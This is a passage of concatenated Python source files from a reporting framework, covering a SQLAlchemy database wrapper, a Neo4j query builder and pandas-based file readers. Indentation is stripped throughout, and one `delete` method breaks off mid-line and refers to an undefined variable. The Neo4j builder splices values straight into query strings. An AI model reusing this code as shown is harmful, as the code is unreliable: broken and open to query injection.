[SqlAlchemy]( https://www.sqlalchemy.org ) is wrapping up any SQL databases (MySql, Oracle, postgre-SQL ...)
''')
for method_name in dir(self):
if method_name in ['loadSchema', 'loadDataFile']:
continue
if function is not None and function != method_name:
continue
if not "__" in method_name and callable(getattr(self, method_name)):
varNames = inspect.getfullargspec(getattr(self, method_name)).args
outStream.hr()
outStream.title("Function %s(%s)" % (method_name, ", ".join(varNames)), level=2)
docStr = AresMarkDown.AresMarkDown.loads(getattr(self, method_name).__doc__)
outStream.append(docStr.getAttr('dsc'))
if docStr.getAttr('example') != '':
outStream.title("Examples", level=4)
outStream.code(docStr.getAttr('example'))
outStream.title("Arguments", level=4)
for varName in varNames:
if varName == 'self':
continue
if varName in ares.doc.DocAresPmts.PARAMETERS:
outStream.append("%s: %s" % (varName, outStream.params(varName)))
else:
countMissing[varName] += 1
outStream.src(__file__)
outStream.export(outType)
def loadSchema(self, filename=None, modelPath=None, reset=False, migrate=True):
"""
:category: SQL Framework
:rubric: PY
:dsc:
Function that takes care of initialising the DB
Please note that some column names are prohibited such as lst_mod_dt
"""
if not filename and not modelPath:
raise Exception("You need to specify at least a file name or a model path")
if modelPath:
sys.path.append(modelPath)
for pyFile in os.listdir(modelPath):
if not pyFile.endswith('.py') or pyFile == '__init__.py':
continue
if filename and filename != pyFile:
continue
self._loadSqlFile(pyFile, reset, migrate)
elif filename:
self._loadSqlFile(filename, reset, migrate)
def cloneTable(self, oldTable, newTable, mapping=None, force=False):
"""
:dsc: Helps to migrate between two tables. The mapping argument is used in case the column names differ between the two tables
"""
oldTableSchema = sqlalchemy.Table(oldTable, self.metadata)
print(self.engine.table_names())
print(self.metadata.tables)
newTableSchema = sqlalchemy.Table(newTable, self.metadata)
print(newTableSchema.name)
print(newTableSchema.columns)
print(oldTable)
print(oldTableSchema.columns)
if self.engine.has_table(newTable):
newTableSchema.drop(self.engine, checkfirst=True)
for column in oldTableSchema.columns:
column.name = mapping.get(column.name, column.name) if mapping else column.name
newTableSchema.append_column(column)
print(newTableSchema.columns)
newTableSchema.create(self.engine, checkfirst=True)
def migrateTable(self, fromTable, toTable, mapping=None):
"""
:dsc: copy data from one table to another
"""
oldData = list(self.select([fromTable]).getData())
self.insert(toTable, oldData.to_dict('records'), commit=True)
def forceCreate(self):
"""
:category: SQL Framework
:rubric: PY
:type: Creation
:dsc:
Force the creation of the database in the given project
:return: The dbOjb
"""
Base = declarative_base()
Base.metadata.create_all(self.engine)
return self
def loadDataFile(self, fileName, filePath, reset=False, newTables=None):
"""
:category: SQL Framework
:rubric: PY
:example: aresObj.db().loadDataFile("youpi3.py")
:dsc:
Load a python sql file to the local database.
This will only add records and then commit the changes.
Those data should not be sensitive ones if they are store and committed to the folder.
"""
sys.path.append(filePath)
dataMod = importlib.import_module(fileName.replace(".py", ""))
if hasattr(dataMod, 'data') and hasattr(dataMod, 'target'):
conn = self.engine.connect()
header = dataMod.data[0]
sqlTarget = self.table(dataMod.target)
if reset:
conn.execute(sqlTarget.delete())
if dataMod.target in newTables or newTables is None:
print("Loading data from %s" % dataMod.target)
if isinstance(header, list):
for rec in dataMod.data[1:]:
conn.execute(sqlTarget.insert().values(dict(zip(header, rec))))
else:
for rec in dataMod.data:
conn.execute(sqlTarget.insert().values(rec))
def where(self, stmts):
"""
:category: SQL Framework
:rubric: PY
:example:
db.select().where([db.column("table", 'column') == 'X')
db.select( ['BNP'] ).where([ db.column('BNP', 'date') == '22/04/2013 00:00'] ).toDf()
:dsc:
Add a where clause to the SqlAlchemy query.
:return: The python object itself
"""
for stmt in stmts:
self.query = self.query.where(stmt)
return self
def select(self, tableNames):
"""
:category: SQL Framework
!rubric: PY
:example: aresObj.db().select(["worldcup_teams"])
:dsc:
Create a SQL statment
:link sqlalchemy: http://docs.sqlalchemy.org/en/latest/core/selectable.html
:link sqlalchemy: http://docs.sqlalchemy.org/en/latest/core/sqlelement.html
:return: self
"""
tables = [sqlalchemy.Table(table, self.metadata, autoload=True) for table in tableNames]
self.query = sqlalchemy.sql.select(tables)
return self
def delete(self, tableName):
"""
:category: SQL Framework
!rubric: PY
:example: aresObj.db().delete('table1')
:dsc:
Create a delete SQL statment
:link sqlalchemy: http://docs.sqlalchemy.org/en/latest/core/selectable.html
:link sqlalchemy: http://docs.sqlalchemy.org/en/latest/core/sqlelement.html
:return: self
"""
if self.engine.has_table(tableName):
self.engin
self.query = sqlalchemy.sql.select(tables)
return self
def insert(self, tableName, records, commit=False, colUserName=None):
"""
:category: SQL Framework
!rubric: PY
:example: db.insert('table1',[{'name': 'test'}], commit=True)
:dsc:
insert a list of records to a table
:return: The python object itself
"""
dflt = {'lst_mod_dt': datetime.datetime.utcnow()}
errorCount, errorLog = 0, []
table = sqlalchemy.Table(tableName, self.metadata)
if not self.engine.has_table(table.name):
raise Exception("Table does not exist")
if colUserName is not None:
dflt[colUserName] = self.username
if 'hostname' in self.columnsList(tableName):
dflt['hostname'] = self.userhost
if isinstance(records, dict):
records = [records]
for rec in records:
try:
tmpRec = dict(rec)
tmpRec.update(dflt)
self.session.execute(table.insert().values(tmpRec))
except Exception as err:
logging.warning(traceback.format_exc())
errorCount += 1
errorLog.append(traceback.format_exc().split('\n')[-1])
if commit:
self.session.commit()
if errorCount:
return (False, errorCount, errorLog)
return (True, 0, [])
def getData(self, limit=None):
"""
:category: SQL Framework
:rubric: PY
:example: aresObj.db().getData()
:dsc:
Returns the results of the select statement previously instantiated in a pandas dataframe
:return: A pandas dataframe
"""
if self.query is None:
return None
if limit:
return ares_pandas.read_sql(self.query, self.query.bind).head(limit)
return ares_pandas.read_sql(self.query, self.query.bind)
def fetch(self, limit=None):
"""
:category: SQL Framework
:rubric: PY
:example: aresObj.db().fetch()
:dsc:
Similar to getData but return an iterator over a list instead of using pandas
:return: An iterator over the result of the query
"""
if self.query is None:
yield None
counter = 0
if not limit:
limit = -1
for row in self.engine.connect().execute(self.query):
if limit == -1 or counter < limit:
counter += 1
yield row
else:
raise StopIteration
def tablesList(self):
"""
:category: SQL Framework
:rubric: PY
:example: aresObj.db().tablesList()
:dsc:
Return the list of tables defined in the selected database
:return: A python object with the list of tables
"""
return self.engine.table_names()
def columnsList(self, tableName):
"""
:category: SQL Framework
:rubric: PY
:example: aresObj.db().columnsList()
:dsc:
Return the list of columns defined in the selected database
:return: A python object with the list of tables
"""
table = sqlalchemy.Table(tableName, self.metadata)
if self.engine.has_table(table.name):
return table.columns
raise Exception('Table does not exist')
def table(self, tableName):
"""
:category: SQL Framework
:rubric: PY
:example: db.table('table1')
:dsc:
Return a sqlAlchemy table object. This can be useful in the where clauses
:return: Python table object
"""
if self.engine.has_table(tableName):
return sqlalchemy.Table(tableName, self.metadata)
raise Exception('Table does not exist')
def column(self, tableName, columnName):
"""
:category: SQL Framework
:rubric: PY
:example: select().where([db.column("table", 'column') == 'X')
:dsc:
Return a sqlAlchemy column object. This can be useful in the where clauses
:return: Python column object
"""
table = sqlalchemy.Table(tableName, self.metadata, autoload=True)
if self.engine.has_table(table.name):
return getattr(table.c, columnName)
def drop(self, tableName, withCheck=True):
"""
:category: SQL Framework
:rubric: PY
:example:
aresObj.db().drop('test')
aresObj.db().drop('test', withCheck=False)
:dsc:
Delete the table from the database.
The pre check can be disabled and the table will be automatically created again when the report will be retriggered.
No extra function to create a table in the framework this is done by the AReS framework
"""
if withCheck:
try:
name = input("Are you sure to delete the table %s (Y/N)? " % tableName)
except:
name = raw_input("Are you sure to delete the table %s (Y/N)? " % tableName)
if name == 'Y':
sqlalchemy.Table(tableName, self.metadata, autoload=True).drop()
logging.info("Table %s deleted" % tableName)
else:
sqlalchemy.Table(tableName, self.metadata, autoload=True).drop()
logging.info("Table %s deleted" % tableName)
def delete(self, tableName, whereClauses=None, commit=False):
"""
:category: SQL Framework
:rubric: PY
:type:
:dsc:
This function will delete records matching the whereClauses from an existing table
:example: db.delete('test', [db.table('test').id == 1])
:return: self
"""
if whereClauses:
self.engine.execute(self.table(tableName).delete().where(whereClauses))
else:
self.engine.execute(self.table(tableName).delete())
if commit:
self.commit()
return self
def emptyTable(self, tableName):
"""
:category: SQL Framework
:rubric: PY
:type:
:dsc:
This function will empty an existing table
:example: db.emptyTable('test')
:return: self
"""
self.delete(tableName)
logging.info('Content of table %s deleted' % tableName)
self.commit()
return self
def commit(self):
self.session.commit()
def createTable(self, records, fileName, tableName, path=None, reset=False, migrate=True, commit=True, isAresDf=True):
"""
:example:
df = aresObj.file(htmlCode=r"IBRD_Balance_Sheet__FY2010.csv").read()
modelFilePath = df.saveTo(fileFamily="model")
db = aresObj.db(database=r"newTest.db").forceCreate()
dbObj.createTable(records=df, **modelFilePath)
"""
self.loadSchema(modelPath=path, filename=fileName, reset=reset, migrate=migrate)
self.insert(records=records.records(), commit=commit, tableName=tableName)
class AresSqlConn(SqlConn):
"""
:category: SQL Framework
:rubric: PY
:dsc: Simple Wrapper around SqlConn to simplify DB interractions for the AReS Fwk
"""
ARES_DEP = True
def __init__(self, aresObj, dbFamily, database=None, modelPath=None, reset=False, **kwargs):
"""
:category: SQL Framework
:rubric: PY
:dsc: Allocates the aresObj to access the user_reports folders
"""
self.aresObj = aresObj
if not modelPath and self.aresObj.run.host_name != 'Script':
modelPath = os.path.join(self.aresObj.run.local_path, 'model', 'tables')
if not os.path.exists(modelPath):
modelPath = None
super(AresSqlConn, self).__init__(dbFamily, database=database, modelPath=modelPath, reset=reset, **kwargs)
def loadDataFile(self, fileName, filePath=None, reset=False, newTables=None):
"""
:category: SQL Framework
:rubric: PY
:example: aresObj.db().loadDataFile("youpi3.py")
:dsc:
Load a python sql file to the local database.
This will only add records and then commit the changes.
Those data should not be sensitive ones if they are store and committed to the folder.
"""
if not filePath:
filePath = self.aresObj.run.report_name
super(AresSqlConn, self).loadDataFile(fileName, filePath=filePath, reset=reset, newTables=newTables)
```
#### File: connectors/dbs/AresDbNeo4j.py
```python
from ares.Lib.AresImports import requires
import traceback
class AresNeo4j(object):
"""
:category: Connector
:rubric: PY
:type: Class
:dsc:
:link Documentation: https://neo4j.com/developer/python/
https://community.neo4j.com/?_ga=2.69585106.394662973.1539480121-615400289.1539480121
"""
ALIAS = 'NEO4J'
_extPackages = [("neo4j", 'neo4j-driver')]
def __init__(self, host=None, port=None, usr=None, pwd=None):
self.pkgs = {}
if self._extPackages is not None:
for name, package in self._extPackages:
self.pkgs[name] = requires(name, reason='Missing Package', install=package, autoImport=True, sourceScript=__file__)
self.driver = self.pkgs["neo4j"].GraphDatabase.driver('bolt://%s:%s' % (host, port), auth=(usr, pwd))
self.query = []
def raw_query(self, query):
try:
with self.driver.session() as session:
for rec in session.run(query):
yield rec
except:
print(traceback.format_exc())
raise StopIteration
def create(self):
self.query.append('CREATE')
return self
def match(self):
self.query.append('MATCH')
return self
def foreach(self, conditions):
"""
"""
raise NotImplemented
def where(self, condition):
return self
def delete(self, node_names, detach=False):
if detach:
self.query.append('DETACH')
self.query.append('DELETE %s' % ','.join(node_names))
try:
with self.driver.session() as session:
session.run(self.compose(self.query))
self.query = []
return True
except:
print(traceback.format_exc())
self.query = []
return False
def retreive(self, names):
self.query.append('RETURN')
self.query.append(','.join(names))
return self
def clear(self):
"""
:dsc: Clears all nodes and edges from the Database
"""
return self.match().node('n').delete(['n'], detach=True)
def node(self, name='', labels=None, attr=None):
"""
:dsc: adds the node patern to the query
"""
if not labels:
labels = []
else:
labels[0] = ':%s' % labels[0]
if not attr:
attr = ''
else:
tmp_attr_list = []
for attr_key, attr_value in attr.items():
tmp_attr_list.append('%s: "%s"' % (attr_key, attr_value))
attr = '{%s}' % ','.join(tmp_attr_list)
self.query.append("(%s%s %s)" % (name, ':'.join(labels), attr))
return self
def link(self, labels='', attr=None, direction="from"):
"""
:dsc: adds the edge definition to the query
"""
if direction == 'from':
self.query.append('-[%s]->' % labels)
else:
self.query.append('<-[%s]-' % labels)
return self
def alias(self, aliases):
"""
:dsc: defines a set of aliases that will appear as WITH a, b, c, d as count(id)
The aliases argument will be defined as follows: ['a', 'b', 'c', {'d': 'count(id)'}]
"""
self.query.append('WITH')
tmp_query = []
for expression in aliases:
if isinstance(expression, dict):
for expr, alias in expression.items():
tmp_query.append('%s as %s' % (expr, alias))
else:
tmp_query.append(expression)
self.query.append(', '.join(tmp_query))
return self
def compose(self, query):
"""
:dsc: Simply joins the query clauses all together
"""
return ' '.join(query)
def execute(self):
try:
with self.driver.session() as session:
for rec in session.run(self.compose(self.query)):
yield rec
except:
print(traceback.format_exc())
raise StopIteration
```
#### File: connectors/files/AresFileJson.py
```python
import json
from ares.Lib.connectors.files import AresFile
class FileJson(AresFile.AresFile):
"""
:category: Ares File
:rubric: PY
:type: Class
:dsc:
Parse the Json file
"""
__fileExt = ['.json']
label = "Interface to deal with Json files"
def _read(self, **kwargs):
"""
:category:
:rubric:
:type:
:dsc:
"""
return json.load(open(self.filePath))
def write(self, data, isAresDf=False):
"""
:category:
:rubric:
:type:
:dsc:
"""
if isAresDf:
data = data.records()
self.setFolder()
with open(self.filePath, 'w') as outfile:
json.dump(data, outfile)
```
#### File: connectors/files/AresFilePandas.py
```python
import time
import os
import json
from ares.Lib.connectors.files import AresFile
from ares.Lib.js import AresJsEncoder
from ares.Lib.AresImports import requires
# Will automatically add the external library to be able to use this module
ares_pandas = requires("pandas", reason='Missing Package', install='pandas', autoImport=True, sourceScript=__file__)
class AresFileSeries(ares_pandas.Series):
@property
def _constructor(self):
return AresFileSeries
@property
def _constructor_expanddim(self):
return AresFileDataFrame
_metadata = ['filePath', 'aresObj', 'selectCols', '_ares_data', '_filters', 'htmlId', 'jsColsUsed']
# @classmethod
# def _internal_ctor(cls, *args, **kwargs):
# kwargs['htmlCode'] = None
# return cls(*args, **kwargs)
class AresFileDataFrame(ares_pandas.DataFrame):
"""
"""
__fileExt = ['.csv', '.txt']
_metadata = ['filePath', 'aresObj']
label = "Pandas Dataframe Interface"
# https://docs.scipy.org/doc/numpy/reference/arrays.dtypes.html
dataTypeMap = {'object': {'python': 'str'}, 'int64': {'python': 'int'}, 'float64': {'python': 'float'}}
@property
def _constructor(self):
return AresFileDataFrame
@property
def _constructor_sliced(self):
return AresFileSeries
# @classmethod
# def _internal_ctor(cls, *args, **kwargs):
# print(kwargs)
# kwargs['htmlCode'] = None
# return cls(*args, **kwargs)
# Remove the error message by declaring the columns as metadata
_metadata = ['filePath', 'aresObj', 'selectCols', '_ares_data', '_filters', 'htmlId', 'jsColsUsed']
def __init__(self, data=None, filePath=None, aresObj=None, htmlCode=None, index=None, columns=None, dtype=None, copy=True):
super(AresFileDataFrame, self).__init__(data=data, index=index, columns=columns, dtype=dtype, copy=copy)
self.filePath, self.aresObj, self.selectCols, self._ares_data, self.htmlCode = filePath, aresObj, [], [], htmlCode.replace("/", "_") if htmlCode is not None else htmlCode
self._filters, self.htmlId, self.jsColsUsed = {}, 'recordset_%s' % id(self) if self.htmlCode is None else self.htmlCode.replace("/", "_"), set()
self.filePathNoExt, self.fileExtension = os.path.splitext(filePath) if filePath is not None else (None, None)
self.path, self.filename = os.path.split(filePath) if filePath is not None else (None, None)
@property
def exists(self):
return os.path.exists(self.filePath)
@property
def timestamp(self):
if self.exists:
return time.strftime("%Y%m%d_%H%M%S", time.gmtime())
def read(self, **kwargs):
"""
:example: df = aresObj.file(filename='BNPPARIBASBRA_2018-04-22.txt', path=r'.\ares\doc\data').read(usecols=['date', 'ouv', 'haut'], sep='\t')
"""
if self.filePath is not None:
htmlCode = kwargs.get('htmlCode', self.htmlCode)
if 'htmlCode' in kwargs:
del kwargs['htmlCode']
self._ares_data = AresFileDataFrame(data=ares_pandas.read_csv(self.filePath, sep=kwargs["delimiter"] if kwargs.get("delimiter") is not None else '\t', **kwargs), filePath=self.filePath, aresObj=self.aresObj, htmlCode=htmlCode)
# TODO: Remove this when we will migrate to a list of lists instread of dictionary
cols = dict([(col, col.replace("[", "").replace("]", "").replace("(", "").replace(")", "")) for col in self._ares_data.headers])
self._ares_data.rename(cols, axis='columns', inplace=True)
return self._ares_data
def save(self, **kwargs):
"""
"""
if 'htmlCode' in kwargs and self.aresObj is not None:
self.filename = kwargs['htmlCode']
self.htmlCode = kwargs['htmlCode'].replace("/", "_")
self.path = self.aresObj.run.local_path
if self.path is None:
raise Exception("save error. Path not defined, plase add an html code in this function")
if not os.path.exists(self.path):
os.makedirs(self.path)
self.to_csv(os.path.join(self.path, self.filename), index=kwargs.get("index", False), sep=kwargs["delimiter"] if kwargs.get("delimiter") is not None else '\t', encoding=kwargs.get("encoding", 'utf8'))
def saveTo(self, fileFamily, filePath=None, dbName=None):
"""
"""
facts = AresFile.loadFactory()
if fileFamily.lower() in facts:
if filePath is None:
filePath = self.filePath.replace( self.fileExtension, fileFamily)
newFile = facts[fileFamily](filePath)
newFile.write(self, isAresDf=True)
path, fileName = os.path.split(filePath)
return {'fileName': fileName, 'path': path}
elif fileFamily.lower() == 'model':
if filePath is None:
filePath = self.filePath.replace( self.fileExtension, ".py")
dbName = self.filename.split('.')[0] if dbName is None else dbName
dbTableFile = ["import sqlalchemy", "def table(meta):"]
dbMapType = {"object": 'Text', 'int64': 'Integer', 'float64': 'REAL'}
dbTableFile.append(" return sqlalchemy.Table('%s', meta, " % dbName)
for i, h in enumerate(list(self.dtypes)):
dbTableFile.append(" sqlalchemy.Column('%s', sqlalchemy.%s, nullable=False)," % (self.dtypes.index[i], dbMapType[str(h)]) )
dbTableFile.append(" )")
outFile = open(filePath, "w")
outFile.write( "\n".join(dbTableFile) )
outFile.close()
path, fileName = os.path.split(filePath)
return {'fileName': fileName, 'path': path, 'tableName': dbName}
@property
def headers(self): return list(self.dtypes.index)
@property
def types(self):
return [['Column Name', 'Type']] + [[self.dtypes.index[i], self.dataTypeMap[str(d)]['python']] for i, d in enumerate(list(self.dtypes))]
@property
def details(self):
return [['Attribute', 'Value'], ['Columns count', self.shape[1]], ['Rows count', self.shape[0]], ["Timestamp", self.timestamp]]
@property
def count(self): return self.shape[0]
def max(self, column): return self.loc[self[column].idxmax()][column]
def min(self, column): return self.loc[self[column].idxmin()][column]
def dict(self, index, value):
"""
:category: Dataframe
:rubric: PY
:type: Pandas
:example: aresDf.dict("col1", "col2")
:dsc:
Create a dictionary from two Pandas Dataframe columns
:link Pandas documentation: https://pandas.pydata.org/pandas-docs/version/0.22/generated/pandas.DataFrame.to_dict.html
:return: Python dictionary
"""
return ares_pandas.Series(self[value].values, index=self[index]).to_dict()
def forEach(self, fnc, inplace=True, **kwds):
"""
:category: Dataframe
:rubric: PY
:type: Transformation
:dsc:
Functional way to transform each records in a dataframe.
The function should return a new dictionary which will be added to the new underlying records object.
:return: The AReS Dataframe
:example: dfObj.forEach(lambda rec: {'a': rec['a'] + 4, "b": "aa%s" % rec['b'] }, inplace=False )
"""
tmpDf = AresFileDataFrame( [ fnc(rec, **kwds) for rec in self.to_dict(orient='records') ] )
if inplace:
self = tmpDf
return self
return tmpDf
def to_numeric(self, colNames):
if self.empty:
return self
if isinstance(colNames, list):
for colName in colNames:
self[colName] = self[colName].apply(ares_pandas.to_numeric)
else:
self[colNames] = self[colNames].apply(ares_pandas.to_numeric)
return self
def addColMap(self, dstColName, srcColName, mapDict, intKey=None, dflt='', replace=True):
"""
:category: Python - Pandas wrapper
:example: dfObj.addColMap('test', 'col1', {"col1": 1, "b": 2}, intKey="b" )
:dsc:
Add a column from a python dictionnary.
:return: The AReS Dataframe itself
:link Pandas documentation: https://pandas.pydata.org/pandas-docs/version/0.22/generated/pandas.DataFrame.apply.html
"""
if intKey is None:
self.addCol(dstColName, lambda row: mapDict.get(row[srcColName], dflt))
else:
self.addCol(dstColName, lambda row: mapDict.get(row[srcColName], {}).get(intKey, dflt))
if replace:
self.dropCol([srcColName])
return self
def top(self, n, colName, ascending=False):
"""
:category: Python - Pandas wrapper
:example: aresDf.top(10, "col1")
:dsc:
Return a new AReS dataframe with only the Nth top values in the selected column
:link Pandas documentation: https://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.sort_values.html
:return: A reduced AReS Dataframe
"""
return self.sort_values(colName, ascending=ascending).head(n)
def addCol(self, colName, fnc, isJsUsed=True, axis=1):
"""
:category: Dataframe
:example: dfObj.addCol('test', lambda x: x['col1'] + 2)
:dsc:
Add a column to the existing Dataframe according to a special function.
:return: The AReS Dataframe itself
:link Pandas documentation: https://pandas.pydata.org/pandas-docs/version/0.22/generated/pandas.DataFrame.apply.html
"""
self[colName] = self.apply(fnc, axis=axis)
if isJsUsed:
self.jsColsUsed.add(isJsUsed)
return self
def reduce(self, colNames, inplace=True):
"""
:return: Return the or a new AReS Dataframe
"""
for colName in colNames:
self.jsColsUsed.add(colName)
colsToDrop = []
for col in self.headers:
if not col in colNames:
colsToDrop.append(col)
if inplace:
self.drop(colsToDrop, axis=1, inplace=inplace)
return self
else:
return AresFileDataFrame(self.drop(colsToDrop, axis=1, inplace=inplace))
def lookupCol(self, left_on, df2, cols, renameCols, right_on=None, aggFnc=None):
"""
:return: Return the AReS Dataframe
"""
if right_on is None:
right_on = left_on
tempDf = df2.df[[right_on] + cols]
tempDf.rename(renameCols, axis=1, inplace=True)
newDf = ares_pandas.merge(self, tempDf, how='left', left_on=left_on, right_on=right_on).fillna(0)
if aggFnc is not None:
headers = self.headers
for col in renameCols.values():
if "%s_x" % col in headers and "%s_y" % col in headers:
if aggFnc == 'sum':
newDf.addCol(col, lambda x: x['%s_x' % col] + x['%s_y' % col])
elif aggFnc == 'avg':
newDf.addCol(col, lambda x: (x['%s_x' % col] + x['%s_y' % col]) / 2)
newDf.dropCol( ['%s_x' % col, '%s_y' % col])
return newDf
def dropCol(self, colNames, inplace=True):
"""
:category: Dataframe
:rubric: PY
:type: Pandas
:example:
:dsc:
:return:
"""
dfHeader = self.headers
if isinstance(colNames, list):
if inplace:
for colName in colNames:
if colName in dfHeader: # Need to check as the export will create a first column
if colName in self.jsColsUsed:
self.jsColsUsed.remove(colNames)
self.drop(colName, axis=1, inplace=inplace)
return self
else:
firstCol = True
for colName in colNames:
if colName in dfHeader:
# Need to check as the export will create a first column
if firstCol:
newDf = self.drop(colName, axis=1, inplace=False)
else:
newDf.drop(colName, axis=1, inplace=True)
return self.aresObj.df(newDf)
else:
if colNames in dfHeader:
# Need to check as the export will create a first column
if colNames in self.jsColsUsed and inplace:
self.jsColsUsed.remove(colNames)
result = self.drop(colNames, axis=1, inplace=inplace)
return result if inplace else self.aresObj.df(result)
return self
def sort(self, colsIdx, ascending=True, axis=0, inplace=True):
"""
:category: Python - Pandas wrapper
:example: aresDf.sort("col1")
:dsc:
Function to sort the content of a dataframe according to a defined column
:link Pandas documentation: https://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.sort_values.html
:return: A reduced AReS Dataframe
"""
self.sort_values(colsIdx, ascending=ascending, axis=axis, inplace=inplace)
return self
def tolist(self, colName, dropDuplicates=False, withAll=False):
"""
:category: Dataframe
:rubric: PY
:type: Transformation
:dsc:
Get from a dataframe a single series based on its column name
:example: data.tolist("b", duplicate=False) # This will remove the duplicated entries
:return: Return a Python list with or without duplicated entries
"""
if dropDuplicates:
if withAll:
return [''] + self[colName].drop_duplicates().tolist()
return self[colName].drop_duplicates().tolist()
if withAll:
return [''] + self[colName].tolist()
return self[colName].tolist()
def attach(self, htmlObj):
"""
:category: Dataframe
:rubric: JS
:type: Front End
:dsc:
Attach the Dataframe to a HTML Object. This function is normally used in the different components in order
to guarantee the link of the data. This will also ensure that the same data set will be store only once in the page
"""
self.aresObj.jsSources[self.htmlCode]['containers'].append(htmlObj)
def records(self, selectCols=None, dropna=None):
"""
:category: Dataframe
:rubric: PY
:type: Transformation
:dsc:
Return a clean list of dictionaries. If the selectCols is set to false there will be not
clean up based on the selected column in the report. All the columns will remain in the report.
:return:
"""
selectCols = self.selectCols if selectCols is None else selectCols
dropna = self.dropna if dropna is None else dropna
if selectCols:
self.reduce(self.jsColsUsed)
if dropna:
return [{k: v for k, v in m.items() if ares_pandas.notnull(v)} for m in self.to_dict(orient='rows')]
return self.to_dict(orient='records')
def toList(self):
"""
:category: Dataframe
:rubric: PY
:type: Transformation
:dsc:
:return: A list of lists with the data
"""
if len(self.selectCols) == 0:
self.selectCols = self.columns.tolist()
return [self.selectCols] + self[self.selectCols].values.tolist()
def html(self):
# for filterId, filterDefinition in self._filters.items():
# jsFilters = []
# for rule in filterDefinition['filters']:
# jsFilters.append("if (!( %s )) { validLine = false ;} ;" % rule)
# self.aresObj.jsGlobal.fnc('%s(data)' % filterId, '''
# filteredData = [];
# data.forEach( function (rec) {
# var validLine = true ; %s ;
# if (validLine) { filteredData.push( rec ); }
# }); return filteredData ; ''' % ";".join(jsFilters))
#
# for container in self.aresObj.jsSources[self.htmlCode]['containers']:
# if container.category == 'Charts':
# dataComp = "DictToChart(%s(%s), %s, %s)" % (filterId, self.htmlCode, json.dumps(container.data.xAxis), json.dumps(container.data.seriesNames))
# else:
# dataComp = "%s(%s)" % (filterId, self.htmlCode)
# if getattr(container.data, 'dataFncs', None) is not None:
# for fnc in container.data.dataFncs:
# self.aresObj.jsGlobal.fnc("%s(data)" % fnc, DataFncChart.DATA_TRANS[fnc])
# dataComp = "%s(%s)" % (fnc, dataComp)
# for src in filterDefinition['src']:
# src['obj'].jsFrg(src['event'], container.jsGenerate(dataComp))
self.aresObj.jsGlobal.add(self.htmlCode, json.dumps(self.records(), cls=AresJsEncoder.AresEncoder))
return ''
def tableHeader(self, forceHeader=None, headerOptions=None):
if forceHeader is not None:
for header in forceHeader:
if 'format' not in header and 'className' not in header:
header['className'] = 'py_cssdivtextleft'
# The table does not work well when both are defined
if 'className' in header and 'class' in header:
header['className'] = "%s %s" % (header['className'], header['class'])
del header['class']
return forceHeader
#
colTypes = {}
# if self.dtypes is not None:
# print self.dtypes
# if not self.empty and self.dtypes == 'tuple':
# for hdr in self.headers:
# colTypes[hdr] = {'type': 'tuple'}
# elif not self.empty and self.dtypes == 'cell':
# for hdr in self.headers:
# colTypes[hdr] = {'type': 'cell'}
# else:
# colTypes = self.dtypes
if headerOptions is None:
headerOptions = {}
# headerMap will order and reduce the perimeter of columns
headerMap = {'orderCols': []}
for i, val in enumerate(self.dtypes):
colName = self.dtypes.index[i]
if val == 'float64':
row = {'data': colName, 'title': colName, 'format': 'float', "searchable": True}
elif val == 'bool':
row = {'data': colName, 'title': colName, 'display': 'checkbox', "searchable": True}
elif val == 'int64':
row = {'data': colName, 'title': colName, 'format': 'float', 'digits': 0, "searchable": True}
else:
row = {'data': colName, 'title': colName, 'className': 'py_cssdivtextleft', "searchable": True}
row.update(colTypes.get(colName, {}))
row.update(headerOptions.get(colName, {}))
headerMap[colName] = row
headerMap['orderCols'].append(colName) # This is to keep the header in the file
headers = []
for colName in headerOptions.get('fixedColumns', headerMap['orderCols'] ):
row = headerMap.get(colName)
if row is not None:
# The table does not work well when both are defined
if 'className' in row and 'class' in row:
row['className'] = "%s %s" % (row['className'], row['class'])
del row['class']
if 'factor' in row:
row['title'] = "%s (%s)" % (row.get('title', colName), row['factor'])
headers.append( row )
return headers
@property
def jsData(self): return self.htmlId
if __name__ == '__main__':
df = AresFileDataFrame(data=[["feef", "bfb"], ["vfv", "bfffsb"]], columns=['A', "V"], filePath=r'D:\BitBucket\Youpi-Ares\user_scripts\outputs\coucou\test.csv')
df.save()
```
#### File: connectors/files/AresFile.py
```python
import time
import logging
import inspect
import importlib
import os
from ares.Lib.AresImports import requires
DSC = {
'eng': '''
:dsc:
## File reader
This section will detail how to handle files and also how to force a particular file loading is the extension is not correct. As defined above some file extension are pre defined to be loaded by a specific class. The default one will just open the file and return it.
Most of the files will be opened using the Pandas interface. Please have a look at the [Pandas wrapper](/api?module=import&enum=package-pandas) for more details.
```python
aresObj.file(filename="")
# The path will be set by default in the output folder of the environment
aresObj.file(filename="", path="")
# In this example the path will be set to a special directly.
# This will only work locally and cannot be used in server mode as the file locally might be different
aresObj.file(filename="", path="", fileFamily=".doc")
# In this example the module used to read the file is overriden. The framework will not rely on the extension anymore
```
'''
}
# Factory for all the files
factory = None
def loadFactory(forceReload=False):
"""
:category: Files
:type: Factory
:rubric: PY
:dsc:
This function will store all the different files parsers available in the Framework. The default file format used
for the data is a Pandas [dataframe](https://fr.wikipedia.org/wiki/Pandas).
In local runs this factory is reloaded after any change of script. On a server mode a variable forceReload will be
used to refresh this factory.
:return: The Python factory
"""
global factory
if forceReload or factory is None:
tmp = {}
for script in os.listdir(os.path.dirname(__file__)):
try:
if script.startswith("AresFile") and script.endswith('py') and script != "AresFile.py":
for name, obj in inspect.getmembers(importlib.import_module("ares.Lib.connectors.files.%s" % script.replace(".py", "")), inspect.isclass):
exts = getattr(obj, '_%s__fileExt' % name, None)
if exts is not None:
for ext in exts:
tmp[ext] = obj
except Exception as err:
logging.warning("%s, error %s" % (script, err))
factory = tmp
return factory
class AresDataSource(object):
"""
:category: Default
:rubric: PY
:type: Data Source
:dsc:
:return: A Python Ares Dataframe like object
"""
__fileExt = None
def __init__(self, dataSrc, htmlCode, aresObj=None):
self.aresObj, self.htmlCode, self.headers = aresObj, htmlCode, []
self.aresObj.jsSources[htmlCode] = {"data": self, 'containers': []}
self.jsData, self.columns, self.dataSrc = "null", dataSrc.get('columns', []), dataSrc
def sort_values(self, by, inplace): pass
def attach(self, htmlObj):
"""
:category: Dataframe
:rubric: JS
:type: Front End
:dsc:
Attach the Dataframe to a HTML Object. This function is normally used in the different components in order
to guarantee the link of the data. This will also ensure that the same data set will be store only once in the page
"""
self.aresObj.jsSources[self.htmlCode]['containers'].append(htmlObj)
def tableHeader(self, forceHeader=None, headerOptions=None):
if self.columns is None:
return [{"data": "empty", 'title': "Empty table"}]
return self.columns
